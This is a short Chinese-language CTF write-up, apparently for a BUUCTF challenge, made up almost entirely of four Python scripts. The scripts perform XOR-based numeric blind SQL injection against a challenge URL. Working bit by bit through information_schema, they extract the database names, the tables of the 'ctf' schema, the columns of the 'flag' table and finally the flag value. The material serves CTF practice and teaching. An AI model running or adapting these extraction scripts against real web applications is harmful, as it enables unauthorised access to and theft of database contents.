一上来可以发现是数字类型盲注
显示的是1的界面
那么可以利用之前[极客大挑战 2019]FinalSQL1的脚本进行跑
利用^异或进行盲注
首先爆数据库名
import requests
import time
database_all = ''
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)))))),{},1)=1)^1".format(i)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
sql = "^(length(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''
for j in range(1, len+1):
sql = '^(substr(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))),{},1)=1)^1'.format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
database_all += chr(int(str, 2))
print(database_all)
接着爆表名
import requests
import time
database_all = ''
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')))))),{},1)=1)^1".format(i)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf'))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
sql = "^(length(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.tables)where(table_schema='ctf')),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
database_all += chr(int(str, 2))
print(database_all)
接着爆列名
import requests
import time
database_all = ''
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')))))),{},1)=1)^1".format(i)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag'))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
sql = "^(length(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNs)where(table_NAME='flag')),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
database_all += chr(int(str, 2))
print(database_all)
爆flag
import requests
import time
database_all = ''
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(value))from(ctf.flag)))))),{},1)=1)^1".format(i)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(value))from(ctf.flag))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
sql = "^(length(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
database_all += chr(int(str, 2))
print(database_all)